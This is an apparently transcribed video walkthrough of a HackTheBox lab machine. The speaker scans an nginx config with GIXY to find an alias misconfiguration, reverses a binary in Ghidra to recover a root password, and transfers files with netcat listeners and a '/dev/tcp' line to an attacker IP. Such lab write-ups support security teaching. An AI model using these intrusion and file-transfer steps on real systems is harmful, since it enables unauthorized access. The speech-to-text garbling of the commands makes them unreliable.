nginx.tar.bz2. Okay. Make dir nginx nclvnp 80 nginx.tar.bz2, and we'll copy this file here. Okay, tar-zxvf, zx. There we go. So now we have the Nginx configuration. So we can go to Google and look at, I think it's GIXY. There it is. See opt, git clone, cd GIXY, and actually I think it was a pip install. Yeah. So we can do GIXY-H, and then it wants us to send it the nginx.configuration file. So this will be unattended nginx etc nginx nginx.conf. No issues. Uh-oh. I should have tested this before doing it. Alias. Oh. It's because the virtual host configs is a wrong path. So let's see. LSLA, etc, grep nginx. I do have something in etc, so let's move nginx to nginx.old. And then we can do move HTTP boxes, unattended, nginx, etc here. Okay. GIXY, etc, nginx, nginx.conf. And we have one high finding of the issue. You can see location/dev doesn't have the trailing slash and the alias. So exactly what we thought. And again, the reason why it didn't work before was GIXY was analyzing this. It saw this include statement and went to /etc nginx conf.d, which was my Nginx configuration, not unattended's, which didn't have an issue. So let's clean up, remove nginx, move nginx.old to nginx. Something like that would probably be better in Docker, and that's probably why GIXY supports Docker. So you don't have to worry about those issues. Let's see. Is Ghidra no longer running? I was doing that entire thing while Ghidra loaded, and I guess it crashed. I don't know what happened. Let's try analyzing this again. Let's analyze it. Instead of selecting everything, let's just click Analyze, and I'm going to wait until this loading bar stops. So the binary has finally finished processing. I'm going to go to my window and then define strings. And I'm going to look for, was it Super Palooza or something? Super Kazula. I'm going to find where this is. I'm going to right click on the address, references, show references to this address. Go here. And then we can look around this section. If you look at the decompiled, you can see it's doing a call on getting host name, and then it also does something on boot GUID. If you change the view, where's window? Maybe window function graph. Could be easier to read. I don't know what the host name is here. I don't use this that often. I was hoping it would highlight this. There we go. So, does that, makes a call, goes down. And then we have boot GUID here. Goes, and if those fail, goes down here, which then just sends the Super Kazula. So we wanted to get into this code, so that's why I changed boot GUID and Etsy hostname. It does some magic stuff and then does probably some crypto algorithm here to create some type of sum, which is the root's password. If we echo-n wc-c, we see 40 characters, so that's probably creating some cool string and then doing a SHA-1 sum against it. So I don't know what that SHA-1 sum is. Maybe it's a combination of Etsy hostname and boot GUID. So if we echo-n unattended, the boot GUID, SHA-1 sum, we don't get it. So it's doing something with that. I didn't look enough, but that's essentially the box. If we want, we can clean up our stuff. So Etsy hostname to be back to HDB. We can remove boot GUID. And then I just thought of how to do this. So if we went back to the Guly user, we can create here because we created the SSH key. So if we copy sbin uinit here, we can't. However, we had it on our box. So if we go root HDB boxes unattended init sbin nclvnp 80 u initrd, and then cat dev tcp 10.10.14.3 80 to uinitrd. We can transfer the file, and I don't think it will kill my netcat automatically. So now we can do chmod plus x uinit /. There we go. So now we just have to get that one string. grep cd init grep-ri password. It's in this crypto root. uinitrd, this string. And there we go. We got the password. And I forgot that string here. Oh well. But that is the box. Hope you guys enjoyed. Take care, and I will see you all next week.